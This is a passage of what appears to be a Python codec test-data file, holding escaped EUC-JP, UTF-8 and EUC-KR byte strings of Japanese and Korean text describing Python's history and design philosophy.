"\xa4\xa4\xa4\xde\xa4\xb7\xa4\xbf\xa4\xac\xa1\xa2\x41\x42\x43\x20"
"\xa4\xcf\xbc\xc2\xcd\xd1\xbe\xe5\xa4\xce\xcc\xdc\xc5\xaa\xa4\xcb"
"\xa4\xcf\xa4\xa2\xa4\xde\xa4\xea\xc5\xac\xa4\xb7\xa4\xc6\xa4\xa4"
"\xa4\xde\xa4\xbb\xa4\xf3\xa4\xc7\xa4\xb7\xa4\xbf\xa1\xa3\x0a\xa4"
"\xb3\xa4\xce\xa4\xbf\xa4\xe1\xa1\xa2\x47\x75\x69\x64\x6f\x20\xa4"
"\xcf\xa4\xe8\xa4\xea\xbc\xc2\xcd\xd1\xc5\xaa\xa4\xca\xa5\xd7\xa5"
"\xed\xa5\xb0\xa5\xe9\xa5\xdf\xa5\xf3\xa5\xb0\xb8\xc0\xb8\xec\xa4"
"\xce\xb3\xab\xc8\xaf\xa4\xf2\xb3\xab\xbb\xcf\xa4\xb7\xa1\xa2\xb1"
"\xd1\xb9\xf1\x20\x42\x42\x53\x20\xca\xfc\xc1\xf7\xa4\xce\xa5\xb3"
"\xa5\xe1\xa5\xc7\xa5\xa3\xc8\xd6\xc1\xc8\xa1\xd6\xa5\xe2\xa5\xf3"
"\xa5\xc6\xa5\xa3\x20\xa5\xd1\xa5\xa4\xa5\xbd\xa5\xf3\xa1\xd7\xa4"
"\xce\xa5\xd5\xa5\xa1\xa5\xf3\xa4\xc7\xa4\xa2\xa4\xeb\x20\x47\x75"
"\x69\x64\x6f\x20\xa4\xcf\xa4\xb3\xa4\xce\xb8\xc0\xb8\xec\xa4\xf2"
"\xa1\xd6\x50\x79\x74\x68\x6f\x6e\xa1\xd7\xa4\xc8\xcc\xbe\xa4\xc5"
"\xa4\xb1\xa4\xde\xa4\xb7\xa4\xbf\xa1\xa3\x0a\xa4\xb3\xa4\xce\xa4"
"\xe8\xa4\xa6\xa4\xca\xc7\xd8\xb7\xca\xa4\xab\xa4\xe9\xc0\xb8\xa4"
"\xde\xa4\xec\xa4\xbf\x20\x50\x79\x74\x68\x6f\x6e\x20\xa4\xce\xb8"
"\xc0\xb8\xec\xc0\xdf\xb7\xd7\xa4\xcf\xa1\xa2\xa1\xd6\xa5\xb7\xa5"
"\xf3\xa5\xd7\xa5\xeb\xa1\xd7\xa4\xc7\xa1\xd6\xbd\xac\xc6\xc0\xa4"
"\xac\xcd\xc6\xb0\xd7\xa1\xd7\xa4\xc8\xa4\xa4\xa4\xa6\xcc\xdc\xc9"
"\xb8\xa4\xcb\xbd\xc5\xc5\xc0\xa4\xac\xc3\xd6\xa4\xab\xa4\xec\xa4"
"\xc6\xa4\xa4\xa4\xde\xa4\xb9\xa1\xa3\x0a\xc2\xbf\xa4\xaf\xa4\xce"
"\xa5\xb9\xa5\xaf\xa5\xea\xa5\xd7\xa5\xc8\xb7\xcf\xb8\xc0\xb8\xec"
"\xa4\xc7\xa4\xcf\xa5\xe6\xa1\xbc\xa5\xb6\xa4\xce\xcc\xdc\xc0\xe8"
"\xa4\xce\xcd\xf8\xca\xd8\xc0\xad\xa4\xf2\xcd\xa5\xc0\xe8\xa4\xb7"
"\xa4\xc6\xbf\xa7\xa1\xb9\xa4\xca\xb5\xa1\xc7\xbd\xa4\xf2\xb8\xc0"
"\xb8\xec\xcd\xd7\xc1\xc7\xa4\xc8\xa4\xb7\xa4\xc6\xbc\xe8\xa4\xea"
"\xc6\xfe\xa4\xec\xa4\xeb\xbe\xec\xb9\xe7\xa4\xac\xc2\xbf\xa4\xa4"
"\xa4\xce\xa4\xc7\xa4\xb9\xa4\xac\xa1\xa2\x50\x79\x74\x68\x6f\x6e"
"\x20\xa4\xc7\xa4\xcf\xa4\xbd\xa4\xa6\xa4\xa4\xa4\xc3\xa4\xbf\xbe"
"\xae\xba\xd9\xb9\xa9\xa4\xac\xc4\xc9\xb2\xc3\xa4\xb5\xa4\xec\xa4"
"\xeb\xa4\xb3\xa4\xc8\xa4\xcf\xa4\xa2\xa4\xde\xa4\xea\xa4\xa2\xa4"
"\xea\xa4\xde\xa4\xbb\xa4\xf3\xa1\xa3\x0a\xb8\xc0\xb8\xec\xbc\xab"
"\xc2\xce\xa4\xce\xb5\xa1\xc7\xbd\xa4\xcf\xba\xc7\xbe\xae\xb8\xc2"
"\xa4\xcb\xb2\xa1\xa4\xb5\xa4\xa8\xa1\xa2\xc9\xac\xcd\xd7\xa4\xca"
"\xb5\xa1\xc7\xbd\xa4\xcf\xb3\xc8\xc4\xa5\xa5\xe2\xa5\xb8\xa5\xe5"
"\xa1\xbc\xa5\xeb\xa4\xc8\xa4\xb7\xa4\xc6\xc4\xc9\xb2\xc3\xa4\xb9"
"\xa4\xeb\xa1\xa2\xa4\xc8\xa4\xa4\xa4\xa6\xa4\xce\xa4\xac\x20\x50"
"\x79\x74\x68\x6f\x6e\x20\xa4\xce\xa5\xdd\xa5\xea\xa5\xb7\xa1\xbc"
"\xa4\xc7\xa4\xb9\xa1\xa3\x0a\x0a\xa5\xce\xa4\xf7\x20\xa5\xfe\x20"
"\xa5\xc8\xa5\xad\xaf\xac\xaf\xda\x20\xcf\xe3\x8f\xfe\xd8\x20\x8f"
"\xfe\xd4\x8f\xfe\xe8\x8f\xfc\xd6\x0a",
"\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xaf\xe3\x80\x81\x31\x39\x39\x30\x20\xe5\xb9\xb4\xe3\x81"
"\x94\xe3\x82\x8d\xe3\x81\x8b\xe3\x82\x89\xe9\x96\x8b\xe5\xa7\x8b"
"\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3"
"\x81\x99\xe3\x80\x82\x0a\xe9\x96\x8b\xe7\x99\xba\xe8\x80\x85\xe3"
"\x81\xae\x20\x47\x75\x69\x64\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73"
"\x73\x75\x6d\x20\xe3\x81\xaf\xe6\x95\x99\xe8\x82\xb2\xe7\x94\xa8"
"\xe3\x81\xae\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83\xa9\xe3"
"\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e\xe3\x80"
"\x8c\x41\x42\x43\xe3\x80\x8d\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xab\xe5\x8f\x82\xe5\x8a\xa0\xe3\x81\x97\xe3\x81\xa6\xe3"
"\x81\x84\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x81\x8c\xe3\x80"
"\x81\x41\x42\x43\x20\xe3\x81\xaf\xe5\xae\x9f\xe7\x94\xa8\xe4\xb8"
"\x8a\xe3\x81\xae\xe7\x9b\xae\xe7\x9a\x84\xe3\x81\xab\xe3\x81\xaf"
"\xe3\x81\x82\xe3\x81\xbe\xe3\x82\x8a\xe9\x81\xa9\xe3\x81\x97\xe3"
"\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x81"
"\xa7\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a\xe3\x81\x93\xe3\x81"
"\xae\xe3\x81\x9f\xe3\x82\x81\xe3\x80\x81\x47\x75\x69\x64\x6f\x20"
"\xe3\x81\xaf\xe3\x82\x88\xe3\x82\x8a\xe5\xae\x9f\xe7\x94\xa8\xe7"
"\x9a\x84\xe3\x81\xaa\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83"
"\xa9\xe3\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e"
"\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba\xe3\x82\x92\xe9\x96\x8b\xe5"
"\xa7\x8b\xe3\x81\x97\xe3\x80\x81\xe8\x8b\xb1\xe5\x9b\xbd\x20\x42"
"\x42\x53\x20\xe6\x94\xbe\xe9\x80\x81\xe3\x81\xae\xe3\x82\xb3\xe3"
"\x83\xa1\xe3\x83\x87\xe3\x82\xa3\xe7\x95\xaa\xe7\xb5\x84\xe3\x80"
"\x8c\xe3\x83\xa2\xe3\x83\xb3\xe3\x83\x86\xe3\x82\xa3\x20\xe3\x83"
"\x91\xe3\x82\xa4\xe3\x82\xbd\xe3\x83\xb3\xe3\x80\x8d\xe3\x81\xae"
"\xe3\x83\x95\xe3\x82\xa1\xe3\x83\xb3\xe3\x81\xa7\xe3\x81\x82\xe3"
"\x82\x8b\x20\x47\x75\x69\x64\x6f\x20\xe3\x81\xaf\xe3\x81\x93\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe3\x82\x92\xe3\x80\x8c\x50\x79"
"\x74\x68\x6f\x6e\xe3\x80\x8d\xe3\x81\xa8\xe5\x90\x8d\xe3\x81\xa5"
"\xe3\x81\x91\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a"
"\xe3\x81\x93\xe3\x81\xae\xe3\x82\x88\xe3\x81\x86\xe3\x81\xaa\xe8"
"\x83\x8c\xe6\x99\xaf\xe3\x81\x8b\xe3\x82\x89\xe7\x94\x9f\xe3\x81"
"\xbe\xe3\x82\x8c\xe3\x81\x9f\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa8\xad\xe8\xa8\x88\xe3\x81"
"\xaf\xe3\x80\x81\xe3\x80\x8c\xe3\x82\xb7\xe3\x83\xb3\xe3\x83\x97"
"\xe3\x83\xab\xe3\x80\x8d\xe3\x81\xa7\xe3\x80\x8c\xe7\xbf\x92\xe5"
"\xbe\x97\xe3\x81\x8c\xe5\xae\xb9\xe6\x98\x93\xe3\x80\x8d\xe3\x81"
"\xa8\xe3\x81\x84\xe3\x81\x86\xe7\x9b\xae\xe6\xa8\x99\xe3\x81\xab"
"\xe9\x87\x8d\xe7\x82\xb9\xe3\x81\x8c\xe7\xbd\xae\xe3\x81\x8b\xe3"
"\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80"
"\x82\x0a\xe5\xa4\x9a\xe3\x81\x8f\xe3\x81\xae\xe3\x82\xb9\xe3\x82"
"\xaf\xe3\x83\xaa\xe3\x83\x97\xe3\x83\x88\xe7\xb3\xbb\xe8\xa8\x80"
"\xe8\xaa\x9e\xe3\x81\xa7\xe3\x81\xaf\xe3\x83\xa6\xe3\x83\xbc\xe3"
"\x82\xb6\xe3\x81\xae\xe7\x9b\xae\xe5\x85\x88\xe3\x81\xae\xe5\x88"
"\xa9\xe4\xbe\xbf\xe6\x80\xa7\xe3\x82\x92\xe5\x84\xaa\xe5\x85\x88"
"\xe3\x81\x97\xe3\x81\xa6\xe8\x89\xb2\xe3\x80\x85\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x82\x92\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa6"
"\x81\xe7\xb4\xa0\xe3\x81\xa8\xe3\x81\x97\xe3\x81\xa6\xe5\x8f\x96"
"\xe3\x82\x8a\xe5\x85\xa5\xe3\x82\x8c\xe3\x82\x8b\xe5\xa0\xb4\xe5"
"\x90\x88\xe3\x81\x8c\xe5\xa4\x9a\xe3\x81\x84\xe3\x81\xae\xe3\x81"
"\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\x50\x79\x74\x68\x6f\x6e"
"\x20\xe3\x81\xa7\xe3\x81\xaf\xe3\x81\x9d\xe3\x81\x86\xe3\x81\x84"
"\xe3\x81\xa3\xe3\x81\x9f\xe5\xb0\x8f\xe7\xb4\xb0\xe5\xb7\xa5\xe3"
"\x81\x8c\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x95\xe3\x82\x8c\xe3\x82"
"\x8b\xe3\x81\x93\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\x82\xe3\x81\xbe"
"\xe3\x82\x8a\xe3\x81\x82\xe3\x82\x8a\xe3\x81\xbe\xe3\x81\x9b\xe3"
"\x82\x93\xe3\x80\x82\x0a\xe8\xa8\x80\xe8\xaa\x9e\xe8\x87\xaa\xe4"
"\xbd\x93\xe3\x81\xae\xe6\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x9c"
"\x80\xe5\xb0\x8f\xe9\x99\x90\xe3\x81\xab\xe6\x8a\xbc\xe3\x81\x95"
"\xe3\x81\x88\xe3\x80\x81\xe5\xbf\x85\xe8\xa6\x81\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x8b\xa1\xe5\xbc\xb5\xe3\x83"
"\xa2\xe3\x82\xb8\xe3\x83\xa5\xe3\x83\xbc\xe3\x83\xab\xe3\x81\xa8"
"\xe3\x81\x97\xe3\x81\xa6\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x99\xe3"
"\x82\x8b\xe3\x80\x81\xe3\x81\xa8\xe3\x81\x84\xe3\x81\x86\xe3\x81"
"\xae\xe3\x81\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe3"
"\x83\x9d\xe3\x83\xaa\xe3\x82\xb7\xe3\x83\xbc\xe3\x81\xa7\xe3\x81"
"\x99\xe3\x80\x82\x0a\x0a\xe3\x83\x8e\xe3\x81\x8b\xe3\x82\x9a\x20"
"\xe3\x83\x88\xe3\x82\x9a\x20\xe3\x83\x88\xe3\x82\xad\xef\xa8\xb6"
"\xef\xa8\xb9\x20\xf0\xa1\x9a\xb4\xf0\xaa\x8e\x8c\x20\xe9\xba\x80"
"\xe9\xbd\x81\xf0\xa9\x9b\xb0\x0a"),
'euc_jp': (
"\x50\x79\x74\x68\x6f\x6e\x20\xa4\xce\xb3\xab\xc8\xaf\xa4\xcf\xa1"
"\xa2\x31\x39\x39\x30\x20\xc7\xaf\xa4\xb4\xa4\xed\xa4\xab\xa4\xe9"
"\xb3\xab\xbb\xcf\xa4\xb5\xa4\xec\xa4\xc6\xa4\xa4\xa4\xde\xa4\xb9"
"\xa1\xa3\x0a\xb3\xab\xc8\xaf\xbc\xd4\xa4\xce\x20\x47\x75\x69\x64"
"\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73\x73\x75\x6d\x20\xa4\xcf\xb6"
"\xb5\xb0\xe9\xcd\xd1\xa4\xce\xa5\xd7\xa5\xed\xa5\xb0\xa5\xe9\xa5"
"\xdf\xa5\xf3\xa5\xb0\xb8\xc0\xb8\xec\xa1\xd6\x41\x42\x43\xa1\xd7"
"\xa4\xce\xb3\xab\xc8\xaf\xa4\xcb\xbb\xb2\xb2\xc3\xa4\xb7\xa4\xc6"
"\xa4\xa4\xa4\xde\xa4\xb7\xa4\xbf\xa4\xac\xa1\xa2\x41\x42\x43\x20"
"\xa4\xcf\xbc\xc2\xcd\xd1\xbe\xe5\xa4\xce\xcc\xdc\xc5\xaa\xa4\xcb"
"\xa4\xcf\xa4\xa2\xa4\xde\xa4\xea\xc5\xac\xa4\xb7\xa4\xc6\xa4\xa4"
"\xa4\xde\xa4\xbb\xa4\xf3\xa4\xc7\xa4\xb7\xa4\xbf\xa1\xa3\x0a\xa4"
"\xb3\xa4\xce\xa4\xbf\xa4\xe1\xa1\xa2\x47\x75\x69\x64\x6f\x20\xa4"
"\xcf\xa4\xe8\xa4\xea\xbc\xc2\xcd\xd1\xc5\xaa\xa4\xca\xa5\xd7\xa5"
"\xed\xa5\xb0\xa5\xe9\xa5\xdf\xa5\xf3\xa5\xb0\xb8\xc0\xb8\xec\xa4"
"\xce\xb3\xab\xc8\xaf\xa4\xf2\xb3\xab\xbb\xcf\xa4\xb7\xa1\xa2\xb1"
"\xd1\xb9\xf1\x20\x42\x42\x53\x20\xca\xfc\xc1\xf7\xa4\xce\xa5\xb3"
"\xa5\xe1\xa5\xc7\xa5\xa3\xc8\xd6\xc1\xc8\xa1\xd6\xa5\xe2\xa5\xf3"
"\xa5\xc6\xa5\xa3\x20\xa5\xd1\xa5\xa4\xa5\xbd\xa5\xf3\xa1\xd7\xa4"
"\xce\xa5\xd5\xa5\xa1\xa5\xf3\xa4\xc7\xa4\xa2\xa4\xeb\x20\x47\x75"
"\x69\x64\x6f\x20\xa4\xcf\xa4\xb3\xa4\xce\xb8\xc0\xb8\xec\xa4\xf2"
"\xa1\xd6\x50\x79\x74\x68\x6f\x6e\xa1\xd7\xa4\xc8\xcc\xbe\xa4\xc5"
"\xa4\xb1\xa4\xde\xa4\xb7\xa4\xbf\xa1\xa3\x0a\xa4\xb3\xa4\xce\xa4"
"\xe8\xa4\xa6\xa4\xca\xc7\xd8\xb7\xca\xa4\xab\xa4\xe9\xc0\xb8\xa4"
"\xde\xa4\xec\xa4\xbf\x20\x50\x79\x74\x68\x6f\x6e\x20\xa4\xce\xb8"
"\xc0\xb8\xec\xc0\xdf\xb7\xd7\xa4\xcf\xa1\xa2\xa1\xd6\xa5\xb7\xa5"
"\xf3\xa5\xd7\xa5\xeb\xa1\xd7\xa4\xc7\xa1\xd6\xbd\xac\xc6\xc0\xa4"
"\xac\xcd\xc6\xb0\xd7\xa1\xd7\xa4\xc8\xa4\xa4\xa4\xa6\xcc\xdc\xc9"
"\xb8\xa4\xcb\xbd\xc5\xc5\xc0\xa4\xac\xc3\xd6\xa4\xab\xa4\xec\xa4"
"\xc6\xa4\xa4\xa4\xde\xa4\xb9\xa1\xa3\x0a\xc2\xbf\xa4\xaf\xa4\xce"
"\xa5\xb9\xa5\xaf\xa5\xea\xa5\xd7\xa5\xc8\xb7\xcf\xb8\xc0\xb8\xec"
"\xa4\xc7\xa4\xcf\xa5\xe6\xa1\xbc\xa5\xb6\xa4\xce\xcc\xdc\xc0\xe8"
"\xa4\xce\xcd\xf8\xca\xd8\xc0\xad\xa4\xf2\xcd\xa5\xc0\xe8\xa4\xb7"
"\xa4\xc6\xbf\xa7\xa1\xb9\xa4\xca\xb5\xa1\xc7\xbd\xa4\xf2\xb8\xc0"
"\xb8\xec\xcd\xd7\xc1\xc7\xa4\xc8\xa4\xb7\xa4\xc6\xbc\xe8\xa4\xea"
"\xc6\xfe\xa4\xec\xa4\xeb\xbe\xec\xb9\xe7\xa4\xac\xc2\xbf\xa4\xa4"
"\xa4\xce\xa4\xc7\xa4\xb9\xa4\xac\xa1\xa2\x50\x79\x74\x68\x6f\x6e"
"\x20\xa4\xc7\xa4\xcf\xa4\xbd\xa4\xa6\xa4\xa4\xa4\xc3\xa4\xbf\xbe"
"\xae\xba\xd9\xb9\xa9\xa4\xac\xc4\xc9\xb2\xc3\xa4\xb5\xa4\xec\xa4"
"\xeb\xa4\xb3\xa4\xc8\xa4\xcf\xa4\xa2\xa4\xde\xa4\xea\xa4\xa2\xa4"
"\xea\xa4\xde\xa4\xbb\xa4\xf3\xa1\xa3\x0a\xb8\xc0\xb8\xec\xbc\xab"
"\xc2\xce\xa4\xce\xb5\xa1\xc7\xbd\xa4\xcf\xba\xc7\xbe\xae\xb8\xc2"
"\xa4\xcb\xb2\xa1\xa4\xb5\xa4\xa8\xa1\xa2\xc9\xac\xcd\xd7\xa4\xca"
"\xb5\xa1\xc7\xbd\xa4\xcf\xb3\xc8\xc4\xa5\xa5\xe2\xa5\xb8\xa5\xe5"
"\xa1\xbc\xa5\xeb\xa4\xc8\xa4\xb7\xa4\xc6\xc4\xc9\xb2\xc3\xa4\xb9"
"\xa4\xeb\xa1\xa2\xa4\xc8\xa4\xa4\xa4\xa6\xa4\xce\xa4\xac\x20\x50"
"\x79\x74\x68\x6f\x6e\x20\xa4\xce\xa5\xdd\xa5\xea\xa5\xb7\xa1\xbc"
"\xa4\xc7\xa4\xb9\xa1\xa3\x0a\x0a",
"\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xaf\xe3\x80\x81\x31\x39\x39\x30\x20\xe5\xb9\xb4\xe3\x81"
"\x94\xe3\x82\x8d\xe3\x81\x8b\xe3\x82\x89\xe9\x96\x8b\xe5\xa7\x8b"
"\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3"
"\x81\x99\xe3\x80\x82\x0a\xe9\x96\x8b\xe7\x99\xba\xe8\x80\x85\xe3"
"\x81\xae\x20\x47\x75\x69\x64\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73"
"\x73\x75\x6d\x20\xe3\x81\xaf\xe6\x95\x99\xe8\x82\xb2\xe7\x94\xa8"
"\xe3\x81\xae\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83\xa9\xe3"
"\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e\xe3\x80"
"\x8c\x41\x42\x43\xe3\x80\x8d\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba"
"\xe3\x81\xab\xe5\x8f\x82\xe5\x8a\xa0\xe3\x81\x97\xe3\x81\xa6\xe3"
"\x81\x84\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x81\x8c\xe3\x80"
"\x81\x41\x42\x43\x20\xe3\x81\xaf\xe5\xae\x9f\xe7\x94\xa8\xe4\xb8"
"\x8a\xe3\x81\xae\xe7\x9b\xae\xe7\x9a\x84\xe3\x81\xab\xe3\x81\xaf"
"\xe3\x81\x82\xe3\x81\xbe\xe3\x82\x8a\xe9\x81\xa9\xe3\x81\x97\xe3"
"\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x81"
"\xa7\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a\xe3\x81\x93\xe3\x81"
"\xae\xe3\x81\x9f\xe3\x82\x81\xe3\x80\x81\x47\x75\x69\x64\x6f\x20"
"\xe3\x81\xaf\xe3\x82\x88\xe3\x82\x8a\xe5\xae\x9f\xe7\x94\xa8\xe7"
"\x9a\x84\xe3\x81\xaa\xe3\x83\x97\xe3\x83\xad\xe3\x82\xb0\xe3\x83"
"\xa9\xe3\x83\x9f\xe3\x83\xb3\xe3\x82\xb0\xe8\xa8\x80\xe8\xaa\x9e"
"\xe3\x81\xae\xe9\x96\x8b\xe7\x99\xba\xe3\x82\x92\xe9\x96\x8b\xe5"
"\xa7\x8b\xe3\x81\x97\xe3\x80\x81\xe8\x8b\xb1\xe5\x9b\xbd\x20\x42"
"\x42\x53\x20\xe6\x94\xbe\xe9\x80\x81\xe3\x81\xae\xe3\x82\xb3\xe3"
"\x83\xa1\xe3\x83\x87\xe3\x82\xa3\xe7\x95\xaa\xe7\xb5\x84\xe3\x80"
"\x8c\xe3\x83\xa2\xe3\x83\xb3\xe3\x83\x86\xe3\x82\xa3\x20\xe3\x83"
"\x91\xe3\x82\xa4\xe3\x82\xbd\xe3\x83\xb3\xe3\x80\x8d\xe3\x81\xae"
"\xe3\x83\x95\xe3\x82\xa1\xe3\x83\xb3\xe3\x81\xa7\xe3\x81\x82\xe3"
"\x82\x8b\x20\x47\x75\x69\x64\x6f\x20\xe3\x81\xaf\xe3\x81\x93\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe3\x82\x92\xe3\x80\x8c\x50\x79"
"\x74\x68\x6f\x6e\xe3\x80\x8d\xe3\x81\xa8\xe5\x90\x8d\xe3\x81\xa5"
"\xe3\x81\x91\xe3\x81\xbe\xe3\x81\x97\xe3\x81\x9f\xe3\x80\x82\x0a"
"\xe3\x81\x93\xe3\x81\xae\xe3\x82\x88\xe3\x81\x86\xe3\x81\xaa\xe8"
"\x83\x8c\xe6\x99\xaf\xe3\x81\x8b\xe3\x82\x89\xe7\x94\x9f\xe3\x81"
"\xbe\xe3\x82\x8c\xe3\x81\x9f\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3"
"\x81\xae\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa8\xad\xe8\xa8\x88\xe3\x81"
"\xaf\xe3\x80\x81\xe3\x80\x8c\xe3\x82\xb7\xe3\x83\xb3\xe3\x83\x97"
"\xe3\x83\xab\xe3\x80\x8d\xe3\x81\xa7\xe3\x80\x8c\xe7\xbf\x92\xe5"
"\xbe\x97\xe3\x81\x8c\xe5\xae\xb9\xe6\x98\x93\xe3\x80\x8d\xe3\x81"
"\xa8\xe3\x81\x84\xe3\x81\x86\xe7\x9b\xae\xe6\xa8\x99\xe3\x81\xab"
"\xe9\x87\x8d\xe7\x82\xb9\xe3\x81\x8c\xe7\xbd\xae\xe3\x81\x8b\xe3"
"\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80"
"\x82\x0a\xe5\xa4\x9a\xe3\x81\x8f\xe3\x81\xae\xe3\x82\xb9\xe3\x82"
"\xaf\xe3\x83\xaa\xe3\x83\x97\xe3\x83\x88\xe7\xb3\xbb\xe8\xa8\x80"
"\xe8\xaa\x9e\xe3\x81\xa7\xe3\x81\xaf\xe3\x83\xa6\xe3\x83\xbc\xe3"
"\x82\xb6\xe3\x81\xae\xe7\x9b\xae\xe5\x85\x88\xe3\x81\xae\xe5\x88"
"\xa9\xe4\xbe\xbf\xe6\x80\xa7\xe3\x82\x92\xe5\x84\xaa\xe5\x85\x88"
"\xe3\x81\x97\xe3\x81\xa6\xe8\x89\xb2\xe3\x80\x85\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x82\x92\xe8\xa8\x80\xe8\xaa\x9e\xe8\xa6"
"\x81\xe7\xb4\xa0\xe3\x81\xa8\xe3\x81\x97\xe3\x81\xa6\xe5\x8f\x96"
"\xe3\x82\x8a\xe5\x85\xa5\xe3\x82\x8c\xe3\x82\x8b\xe5\xa0\xb4\xe5"
"\x90\x88\xe3\x81\x8c\xe5\xa4\x9a\xe3\x81\x84\xe3\x81\xae\xe3\x81"
"\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\x50\x79\x74\x68\x6f\x6e"
"\x20\xe3\x81\xa7\xe3\x81\xaf\xe3\x81\x9d\xe3\x81\x86\xe3\x81\x84"
"\xe3\x81\xa3\xe3\x81\x9f\xe5\xb0\x8f\xe7\xb4\xb0\xe5\xb7\xa5\xe3"
"\x81\x8c\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x95\xe3\x82\x8c\xe3\x82"
"\x8b\xe3\x81\x93\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\x82\xe3\x81\xbe"
"\xe3\x82\x8a\xe3\x81\x82\xe3\x82\x8a\xe3\x81\xbe\xe3\x81\x9b\xe3"
"\x82\x93\xe3\x80\x82\x0a\xe8\xa8\x80\xe8\xaa\x9e\xe8\x87\xaa\xe4"
"\xbd\x93\xe3\x81\xae\xe6\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x9c"
"\x80\xe5\xb0\x8f\xe9\x99\x90\xe3\x81\xab\xe6\x8a\xbc\xe3\x81\x95"
"\xe3\x81\x88\xe3\x80\x81\xe5\xbf\x85\xe8\xa6\x81\xe3\x81\xaa\xe6"
"\xa9\x9f\xe8\x83\xbd\xe3\x81\xaf\xe6\x8b\xa1\xe5\xbc\xb5\xe3\x83"
"\xa2\xe3\x82\xb8\xe3\x83\xa5\xe3\x83\xbc\xe3\x83\xab\xe3\x81\xa8"
"\xe3\x81\x97\xe3\x81\xa6\xe8\xbf\xbd\xe5\x8a\xa0\xe3\x81\x99\xe3"
"\x82\x8b\xe3\x80\x81\xe3\x81\xa8\xe3\x81\x84\xe3\x81\x86\xe3\x81"
"\xae\xe3\x81\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20\xe3\x81\xae\xe3"
"\x83\x9d\xe3\x83\xaa\xe3\x82\xb7\xe3\x83\xbc\xe3\x81\xa7\xe3\x81"
"\x99\xe3\x80\x82\x0a\x0a"),
'euc_kr': (
"\xa1\xdd\x20\xc6\xc4\xc0\xcc\xbd\xe3\x28\x50\x79\x74\x68\x6f\x6e"
"\x29\xc0\xba\x20\xb9\xe8\xbf\xec\xb1\xe2\x20\xbd\xb1\xb0\xed\x2c"
"\x20\xb0\xad\xb7\xc2\xc7\xd1\x20\xc7\xc1\xb7\xce\xb1\xd7\xb7\xa1"
"\xb9\xd6\x20\xbe\xf0\xbe\xee\xc0\xd4\xb4\xcf\xb4\xd9\x2e\x20\xc6"
"\xc4\xc0\xcc\xbd\xe3\xc0\xba\x0a\xc8\xbf\xc0\xb2\xc0\xfb\xc0\xce"
"\x20\xb0\xed\xbc\xf6\xc1\xd8\x20\xb5\xa5\xc0\xcc\xc5\xcd\x20\xb1"
"\xb8\xc1\xb6\xbf\xcd\x20\xb0\xa3\xb4\xdc\xc7\xcf\xc1\xf6\xb8\xb8"
"\x20\xc8\xbf\xc0\xb2\xc0\xfb\xc0\xce\x20\xb0\xb4\xc3\xbc\xc1\xf6"
"\xc7\xe2\xc7\xc1\xb7\xce\xb1\xd7\xb7\xa1\xb9\xd6\xc0\xbb\x0a\xc1"
"\xf6\xbf\xf8\xc7\xd5\xb4\xcf\xb4\xd9\x2e\x20\xc6\xc4\xc0\xcc\xbd"
"\xe3\xc0\xc7\x20\xbf\xec\xbe\xc6\x28\xe9\xd0\xe4\xba\x29\xc7\xd1"
"\x20\xb9\xae\xb9\xfd\xb0\xfa\x20\xb5\xbf\xc0\xfb\x20\xc5\xb8\xc0"
"\xcc\xc7\xce\x2c\x20\xb1\xd7\xb8\xae\xb0\xed\x20\xc0\xce\xc5\xcd"
"\xc7\xc1\xb8\xae\xc6\xc3\x0a\xc8\xaf\xb0\xe6\xc0\xba\x20\xc6\xc4"
